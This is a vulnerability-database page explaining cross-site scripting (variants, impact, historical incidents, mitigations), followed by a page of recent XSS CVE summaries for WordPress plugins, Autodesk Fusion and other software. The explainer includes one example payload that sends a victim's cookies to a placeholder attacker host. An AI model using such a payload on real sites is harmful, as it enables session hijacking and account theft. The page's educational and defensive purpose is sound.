Cross-Site Scripting

web MEDIUM

Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.

How It Works

Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding. The attacker crafts input containing JavaScript code, which the application then incorporates into its HTML response. When a victim's browser renders this response, it executes the injected script as if it were legitimate code from the trusted website.

The attack manifests in three main variants. Reflected XSS occurs when malicious script arrives via an HTTP parameter (like a search query) and immediately bounces back in the response—typically delivered through phishing links. Stored XSS is more dangerous: the payload persists in the application's database (in comment fields, user profiles, forum posts) and executes whenever anyone views the infected content. DOM-based XSS happens entirely client-side when JavaScript code improperly handles user-controllable data, modifying the DOM in unsafe ways without ever sending the payload to the server.

A typical attack flow starts with the attacker identifying an injection point—anywhere user input appears in HTML output. They craft a payload like <script>document.location='http://attacker.com/steal?c='+document.cookie</script> and inject it through the vulnerable parameter. When victims access the page, their browsers execute this script within the security context of the legitimate domain, giving the attacker full access to cookies, session tokens, and DOM content.

Impact

  • Session hijacking: Steal authentication cookies to impersonate victims and access their accounts
  • Credential harvesting: Inject fake login forms on trusted pages to capture usernames and passwords
  • Account takeover: Perform state-changing actions (password changes, fund transfers) as the authenticated victim
  • Keylogging: Monitor and exfiltrate everything users type on the compromised page
  • Phishing and malware distribution: Redirect users to malicious sites or deliver drive-by downloads from a trusted domain
  • Data exfiltration: Access and steal sensitive information visible in the DOM or retrieved via AJAX requests

Real-World Examples

A stored XSS vulnerability in Twitter (2010) allowed attackers to create self-propagating worms. Users hovering over malicious tweets automatically retweeted them and followed the attacker, creating viral spread through the platform's legitimate functionality.

eBay suffered from persistent XSS flaws in product listings (CVE-2015-2880) where attackers embedded malicious scripts in item descriptions. Buyers viewing these listings had their sessions compromised, enabling unauthorized purchases and account takeover.

British Airways faced a sophisticated supply chain attack (2018) where attackers injected JavaScript into the airline's payment page. The script skimmed credit card details from 380,000 transactions, demonstrating how XSS enables payment fraud at massive scale.

Mitigation

  • Context-aware output encoding: HTML-encode for HTML context, JavaScript-encode for JS strings, URL-encode for URLs—never use generic escaping
  • Content Security Policy (CSP): Deploy strict CSP headers to whitelist script sources and block inline JavaScript execution
  • HTTPOnly and Secure cookie flags: Prevent JavaScript access to session cookies and ensure transmission over HTTPS only
  • Input validation: Reject unexpected characters and patterns, though this is defense-in-depth, not primary protection
  • DOM-based XSS prevention: Use safe APIs like textContent instead of innerHTML; avoid passing user data to dangerous sinks like eval()

Recent CVEs (10032)

CVE-2025-14745
EPSS 0% CVSS 6.4
MEDIUM This Month

The RSS Aggregator - RSS Import, News Feeds, Feed to Post, and Autoblogging plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp-rss-aggregator' shortcode in all versions up to, and including, 5.0.10 due to insufficient input sanitization and output escaping on user supplied attributes. [CVSS 6.4 MEDIUM]

WordPress XSS PHP
NVD
CVE-2025-14069
EPSS 0% CVSS 6.4
MEDIUM This Month

The Schema & Structured Data for WP & AMP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'saswp_custom_schema_field' profile field in all versions up to, and including, 1.54 due to insufficient input sanitization and output escaping. [CVSS 6.4 MEDIUM]

WordPress XSS PHP
NVD
CVE-2025-15522
EPSS 0% CVSS 6.4
MEDIUM This Month

The Uncanny Automator - Easy Automation, Integration, Webhooks & Workflow Builder Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the automator_discord_user_mapping shortcode in all versions up to, and including, 6.10.0.2 due to insufficient input sanitization and output escaping on the verified_message parameter. [CVSS 6.4 MEDIUM]

WordPress XSS PHP
NVD
CVE-2026-0788
EPSS 0% CVSS 6.1
MEDIUM This Month

8180 Ip Audio Alerter Firmware versions up to 5.5 is affected by cross-site scripting (xss) (CVSS 6.1).

Golang XSS 8180 Ip Audio Alerter Firmware
NVD
CVE-2026-21264
EPSS 0% CVSS 9.3
CRITICAL Act Now

Microsoft Account has a cross-site scripting vulnerability allowing unauthenticated attackers to execute scripts in the context of Microsoft Account pages.

Microsoft XSS Account
NVD
CVE-2025-9289
EPSS 0% CVSS 4.7
MEDIUM This Month

A Cross-Site Scripting (XSS) vulnerability was identified in a parameter in Omada Controllers due to improper input sanitization. Exploitation requires advanced conditions, such as network positioning or emulating a trusted entity, and user interaction by an authenticated administrator.

XSS Oc200 Firmware Oc400 Firmware +3
NVD VulDB
CVE-2026-24389
EPSS 0% CVSS 6.5
MEDIUM This Month

WP Chill Gallery PhotoBlocks photoblocks-grid-gallery is affected by cross-site scripting (xss) (CVSS 6.5).

XSS
NVD
CVE-2026-24383
EPSS 0% CVSS 6.5
MEDIUM This Month

DOM-based cross-site scripting in bPlugins B Slider through version 2.0.6 enables authenticated attackers to inject malicious scripts that execute in users' browsers with network access. An attacker with user privileges can exploit improper input neutralization during web page generation to steal session tokens, perform unauthorized actions, or redirect victims to malicious sites. No patch is currently available for this vulnerability.

XSS
NVD
CVE-2026-24361
EPSS 0% CVSS 6.5
MEDIUM This Month

ThimPress LearnPress Course Review plugin through version 4.1.9 is vulnerable to stored cross-site scripting (XSS) that allows authenticated users with insufficient input validation to inject malicious scripts into course reviews. An attacker with user privileges can exploit this to execute arbitrary JavaScript in other users' browsers, potentially stealing session tokens or performing unauthorized actions on their behalf. No patch is currently available for this vulnerability.

XSS
NVD
CVE-2026-24355
EPSS 0% CVSS 5.4
MEDIUM This Month

favethemes Houzez Theme - Functionality houzez-theme-functionality is affected by cross-site scripting (xss) (CVSS 5.4).

XSS
NVD
CVE-2026-24354
EPSS 0% CVSS 6.5
MEDIUM This Month

DOM-based cross-site scripting in PenciDesign Penci Shortcodes & Performance plugin versions 6.1 and earlier allows authenticated attackers to inject malicious scripts that execute in users' browsers. An attacker with user-level privileges can exploit improper input neutralization during page generation to steal session cookies, perform unauthorized actions, or deface content for affected users. No patch is currently available for this vulnerability.

XSS
NVD
CVE-2026-23976
EPSS 0% CVSS 7.1
HIGH This Week

WP Chill Modula Image Gallery modula-best-grid-gallery is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
CVE-2026-22463
EPSS 0% CVSS 6.5
MEDIUM This Month

Stored XSS in Micro.company Form to Chat App versions up to 1.2.5 enables authenticated attackers to inject malicious scripts that execute in other users' browsers, potentially compromising session data and stealing sensitive information. The vulnerability stems from insufficient input sanitization during form processing and requires user interaction to trigger. No patch is currently available for this medium-severity flaw.

XSS
NVD
CVE-2026-22388
EPSS 0% CVSS 5.9
MEDIUM This Month

Stored XSS in Owl Carousel WP through version 2.2.2 allows authenticated users with high privileges to inject malicious scripts that persist in web pages and execute in visitors' browsers. An attacker with administrative access could exploit improper input sanitization to compromise site visitor sessions or steal sensitive data. A patch is not currently available.

XSS
NVD
CVE-2026-22353
EPSS 0% CVSS 6.5
MEDIUM This Month

Stored XSS in teachPress through version 9.0.12 enables authenticated attackers to inject malicious scripts that execute in other users' browsers, potentially compromising session data and performing unauthorized actions within the application. The vulnerability requires user interaction to trigger and can affect multiple users across the application scope. No security patch is currently available for affected installations.

XSS
NVD
CVE-2026-22349
EPSS 0% CVSS 5.4
MEDIUM This Month

The Menu In Post plugin for Linux through version 1.4.1 contains a DOM-based cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts into web pages viewed by other users. An attacker with user-level access can exploit this to steal session tokens, deface content, or perform actions on behalf of victims. No patch is currently available for this vulnerability.

Linux XSS
NVD
CVE-2026-22347
EPSS 0% CVSS 6.5
MEDIUM This Month

subhansanjaya Carousel Horizontal Posts Content Slider carousel-horizontal-posts-content-slider is affected by cross-site scripting (xss) (CVSS 6.5).

XSS
NVD
CVE-2026-0535
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Stored XSS in Autodesk Fusion allows attackers to inject malicious HTML into component descriptions that executes when users click the payload, enabling local file theft or arbitrary code execution on affected systems. The vulnerability requires user interaction and local access but carries high impact due to the ability to compromise the desktop application's security context. A patch is available for remediation.

XSS Fusion
NVD
CVE-2026-0534
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Stored XSS in Autodesk Fusion allows attackers to inject malicious HTML into part attributes that executes when users interact with crafted files, potentially enabling local file access or arbitrary code execution. This desktop application vulnerability requires user interaction but can compromise system integrity through malicious file sharing. A patch is available.

XSS Fusion
NVD
CVE-2026-0533
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Stored XSS in Autodesk Fusion's design name field allows attackers to inject malicious HTML that executes when users view the delete confirmation dialog, potentially enabling arbitrary code execution or local file access on affected systems. An attacker must first craft a malicious design name that gets stored in the application, then socially engineer a user to interact with the deletion prompt to trigger the payload. A patch is available to address this vulnerability.

XSS Fusion
NVD
CVE-2025-69321
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Spa grandspa allows Reflected XSS.This issue affects Grand Spa: from n/a through <= 3.5.5. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-69320
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Magazine grandmagazine allows Reflected XSS.This issue affects Grand Magazine: from n/a through <= 3.5.7. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-69318
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hossni Mubarak JobWP jobwp allows Stored XSS.This issue affects JobWP: from n/a through <= 2.4.5. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-69317
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in scriptsbundle CarSpot carspot allows Reflected XSS.This issue affects CarSpot: from n/a through < 2.4.6. [CVSS 6.1 MEDIUM]

XSS
NVD
CVE-2025-69316
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RealMag777 TableOn posts-table-filterable allows Reflected XSS.This issue affects TableOn: from n/a through <= 1.0.4.2. [CVSS 6.1 MEDIUM]

XSS
NVD
CVE-2025-69102
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Boopathi Rajan WP Test Email wp-test-email allows Reflected XSS.This issue affects WP Test Email: from n/a through <= 1.1.7. [CVSS 7.1 HIGH]

WordPress XSS PHP
NVD
CVE-2025-69098
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpWave Hide My WP hide_my_wp allows Reflected XSS.This issue affects Hide My WP: from n/a through <= 6.2.12. [CVSS 6.1 MEDIUM]

XSS
NVD
CVE-2025-69056
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins Hotel Listing hotel-listing allows Reflected XSS.This issue affects Hotel Listing: from n/a through <= 1.4.0. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-69054
EPSS 0% CVSS 7.1
HIGH This Week

highwarden Super Logos Showcase superlogoshowcase-wp is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
CVE-2025-69053
EPSS 0% CVSS 7.1
HIGH This Week

LambertGroup Universal Video Player universal-video-player is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
CVE-2025-69051
EPSS 0% CVSS 7.1
HIGH This Week

CridioStudio ListingPro Reviews listingpro-reviews is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
CVE-2025-69048
EPSS 0% CVSS 7.1
HIGH This Week

LambertGroup Universal Video Player universal-video-player is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
CVE-2025-69003
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in QantumThemes KenthaRadio qt-kentharadio allows Reflected XSS.This issue affects KenthaRadio: from n/a through <= 2.2.0. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-68906
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jegtheme JNews - Video jnews-video allows Reflected XSS.This issue affects JNews - Video: from n/a through <= 11.0.2. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-68904
EPSS 0% CVSS 7.1
HIGH This Week

jegtheme JNews - Frontend Submit jnews-frontend-submit is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
CVE-2025-68900
EPSS 0% CVSS 6.5
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kriesi Enfold enfold allows DOM-Based XSS.This issue affects Enfold: from n/a through <= 7.1.3. [CVSS 6.5 MEDIUM]

XSS
NVD
CVE-2025-68898
EPSS 0% CVSS 5.8
MEDIUM This Month

cjjparadoxmax Synergy Project Manager synergy-project-manager is affected by cross-site scripting (xss) (CVSS 5.8).

XSS
NVD
CVE-2025-68894
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in shoutoutglobal ShoutOut shoutout allows Reflected XSS.This issue affects ShoutOut: from n/a through <= 4.0.2. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-68884
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Arevico WP Simple Redirect wp-simple-redirect allows Reflected XSS.This issue affects WP Simple Redirect: from n/a through <= 1.1. [CVSS 7.1 HIGH]

WordPress XSS PHP
NVD
CVE-2025-68883
EPSS 0% CVSS 7.1
HIGH This Week

extremeidea bidorbuy Store Integrator bidorbuystoreintegrator is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
CVE-2025-68871
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in noCreativity Dooodl dooodl allows Reflected XSS.This issue affects Dooodl: from n/a through <= 2.3.0. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-68866
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in woofer696 Dinatur dinatur allows Stored XSS.This issue affects Dinatur: from n/a through <= 1.18. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-68864
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Infility Infility Global infility-global allows Stored XSS.This issue affects Infility Global: from n/a through <= 2.14.50. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-68859
EPSS 0% CVSS 7.1
HIGH This Week

agmorpheus Syntax Highlighter Compress syntax-highlighter-compress is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
CVE-2025-68858
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Casey Bisson wpCAS wpcas allows Reflected XSS.This issue affects wpCAS: from n/a through <= 1.07. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-68849
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Frank Corso Quote Master quote-master allows Reflected XSS.This issue affects Quote Master: from n/a through <= 7.1.1. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-68839
EPSS 0% CVSS 7.1
HIGH This Week

Remi Corson Easy Theme Options easy-theme-options is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
CVE-2025-68838
EPSS 0% CVSS 7.1
HIGH This Week

expresstechsoftware MemberPress Discord Addon expresstechsoftwares-memberpress-discord-add-on is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
CVE-2025-68835
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in matiskiba Ravpage ravpage allows Reflected XSS.This issue affects Ravpage: from n/a through <= 2.33. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-68538
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Craft craftcoffee allows DOM-Based XSS.This issue affects Craft: from n/a through <= 2.3.6. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-68520
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods DotLife dotlife allows Reflected XSS.This issue affects DotLife: from n/a through < 4.9.5. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-68518
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Hoteller hoteller allows Reflected XSS.This issue affects Hoteller: from n/a through < 6.8.9. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-68041
EPSS 0% CVSS 7.1
HIGH This Week

codisto Omnichannel for WooCommerce codistoconnect is affected by cross-site scripting (xss) (CVSS 7.1).

WordPress XSS PHP
NVD
CVE-2025-68012
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dmytro Shteflyuk CodeColorer codecolorer allows Stored XSS.This issue affects CodeColorer: from n/a through <= 0.10.1. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-68011
EPSS 0% CVSS 7.1
HIGH This Week

GLS GLS Shipping for WooCommerce gls-shipping-for-woocommerce is affected by cross-site scripting (xss) (CVSS 7.1).

WordPress XSS PHP
NVD
CVE-2025-68010
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in netgsm Netgsm netgsm allows Reflected XSS.This issue affects Netgsm: from n/a through <= 2.9.63. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-68008
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in mndpsingh287 WP Mail wp-mail allows Reflected XSS.This issue affects WP Mail: from n/a through <= 1.3. [CVSS 7.1 HIGH]

WordPress XSS PHP
NVD
CVE-2025-68004
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kapil Chugh My Post Order my-posts-order allows Reflected XSS.This issue affects My Post Order: from n/a through <= 1.2.1.1. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-67964
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in favethemes Homey Core homey-core allows Reflected XSS.This issue affects Homey Core: from n/a through <= 2.4.3. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-67960
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in purethemes WorkScout-Core workscout-core allows Reflected XSS.This issue affects WorkScout-Core: from n/a through <= 1.7.06. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-67959
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in purethemes WorkScout workscout allows Reflected XSS.This issue affects WorkScout: from n/a through <= 4.1.07. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-67952
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Tour grandtour allows Reflected XSS.This issue affects Grand Tour: from n/a through < 5.6.2. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-67949
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in designingmedia Hostiko hostiko allows Reflected XSS.This issue affects Hostiko: from n/a through < 94.3.6. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-67947
EPSS 0% CVSS 7.1
HIGH This Week

scriptsbundle AdForest Elementor adforest-elementor is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
CVE-2025-67943
EPSS 0% CVSS 7.1
HIGH This Week

wphocus My auctions allegro my-auctions-allegro-free-edition is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
CVE-2025-67923
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetEngine jet-engine allows Reflected XSS.This issue affects JetEngine: from n/a through <= 3.7.7. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-67620
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CleverSoft Anon anon2x allows Reflected XSS.This issue affects Anon: from n/a through <= 2.2.10. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-67614
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in foreverpinetree TheNa thena allows Reflected XSS.This issue affects TheNa: from n/a through <= 1.5.5. [CVSS 7.1 HIGH]

XSS
NVD
CVE-2025-63026
EPSS 0% CVSS 5.4
MEDIUM This Month

ThemeGoods Grand Restaurant Theme Elements for Elementor grandrestaurant-elementor is affected by cross-site scripting (xss) (CVSS 5.4).

XSS
NVD
CVE-2025-62077
EPSS 0% CVSS 5.9
MEDIUM This Month

SEOSEON EUROPE S.L Affiliate Link Tracker affiliate-link-tracker is affected by cross-site scripting (xss) (CVSS 5.9).

XSS
NVD
CVE-2025-53240
EPSS 0% CVSS 6.1
MEDIUM This Month

adamlabs WordPress Photo Gallery photo-gallery-portfolio is affected by cross-site scripting (xss) (CVSS 6.1).

WordPress XSS PHP
NVD
CVE-2025-52762
EPSS 0% CVSS 6.1
MEDIUM This Month

flexostudio flexo-posts-manager flexo-posts-manager is affected by cross-site scripting (xss) (CVSS 6.1).

XSS
NVD
CVE-2025-52746
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ayecode Restaurante restaurante allows Reflected XSS.This issue affects Restaurante: from n/a through <= 3.0.7. [CVSS 6.1 MEDIUM]

XSS
NVD
CVE-2025-50006
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jthemes xSmart xsmart allows Reflected XSS.This issue affects xSmart: from n/a through <= 1.2.9.4. [CVSS 6.1 MEDIUM]

XSS
NVD
CVE-2025-50005
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in tagDiv tagDiv Composer td-composer allows DOM-Based XSS.This issue affects tagDiv Composer: from n/a through <= 5.4.2. [CVSS 6.1 MEDIUM]

XSS
NVD
CVE-2025-49336
EPSS 0% CVSS 5.4
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in pondol Pondol BBS pondol-bbs allows Stored XSS.This issue affects Pondol BBS: from n/a through <= 1.1.8.4. [CVSS 5.4 MEDIUM]

XSS
NVD
CVE-2025-49249
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ApusTheme Drone drone allows Reflected XSS.This issue affects Drone: from n/a through <= 1.40. [CVSS 6.1 MEDIUM]

XSS
NVD
CVE-2025-49066
EPSS 0% CVSS 6.1
MEDIUM This Month

LambertGroup Accordion Slider PRO accordion_slider_pro is affected by cross-site scripting (xss) (CVSS 6.1).

XSS
NVD
CVE-2025-49046
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup xPromoter top_bar_promoter allows Reflected XSS.This issue affects xPromoter: from n/a through <= 1.3.4. [CVSS 6.1 MEDIUM]

XSS
NVD
CVE-2025-49045
EPSS 0% CVSS 6.1
MEDIUM This Month

highwarden Super Interactive Maps super-interactive-maps is affected by cross-site scripting (xss) (CVSS 6.1).

XSS
NVD
CVE-2025-49043
EPSS 0% CVSS 6.1
MEDIUM This Month

LambertGroup Magic Responsive Slider and Carousel WordPress magic_carousel is affected by cross-site scripting (xss) (CVSS 6.1).

WordPress XSS PHP
NVD
CVE-2025-48094
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Magic Slider magic_slider allows Reflected XSS.This issue affects Magic Slider: from n/a through <= 2.2. [CVSS 6.1 MEDIUM]

XSS
NVD
CVE-2025-47666
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Image&Video FullScreen Background lbg_fullscreen_fullwidth_slider allows Reflected XSS.This issue affects Image&Video FullScreen Background: from n/a through <= 1.6.7. [CVSS 6.1 MEDIUM]

XSS
NVD
CVE-2025-47600
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in xtemos WoodMart woodmart allows Code Injection.This issue affects WoodMart: from n/a through <= 8.3.7. [CVSS 6.1 MEDIUM]

Code Injection XSS
NVD
CVE-2025-47500
EPSS 0% CVSS 5.4
MEDIUM This Month

Benjamin Intal Stackable stackable-ultimate-gutenberg-blocks is affected by cross-site scripting (xss) (CVSS 5.4).

XSS
NVD
CVE-2025-32123
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup HTML5 Video Player with Playlist & Multiple Skins lbg-vp2-html5-rightside allows Reflected XSS.This issue affects HTML5 Video Player with Playlist & Multiple Skins: from n/a through <= 5.3.5. [CVSS 6.1 MEDIUM]

XSS
NVD
CVE-2025-27005
EPSS 0% CVSS 6.1
MEDIUM This Month

LambertGroup HTML5 Video Player lbg-vp2-html5-bottom is affected by cross-site scripting (xss) (CVSS 6.1).

XSS
NVD
CVE-2025-67683
EPSS 0% CVSS 6.1
MEDIUM This Month

Quick.Cart is vulnerable to reflected XSS via the sSort parameter. An attacker can craft a malicious URL which, when opened, results in arbitrary JavaScript execution in the victim’s browser. [CVSS 6.1 MEDIUM]

XSS Quick.Cart
NVD
CVE-2025-4763
EPSS 0% CVSS 5.5
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Aida Computer Information Technology Inc. Hotel Guest Hotspot allows Reflected XSS.This issue affects Hotel Guest Hotspot: through 22012026. [CVSS 5.5 MEDIUM]

XSS Hotel Guest Hotspot
NVD
CVE-2026-24037
EPSS 0% CVSS 4.8
MEDIUM POC This Month

Horilla HRMS version 1.4.0 contains insufficient input validation in its XSS prevention function, allowing attackers to bypass protections through context-agnostic regex patterns. Public exploit code exists for this vulnerability, enabling attackers to redirect users to malicious sites, execute arbitrary JavaScript, and steal CSRF tokens for use in admin-targeted attacks. The vulnerability affects Horilla 1.4.0 and has been patched in version 1.5.0.

XSS CSRF Horilla
NVD GitHub
Prev Page 23 of 112 Next

Quick Facts

Typical Severity
MEDIUM
Category
web
Total CVEs
10032

Related CWEs

MITRE ATT&CK

References

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy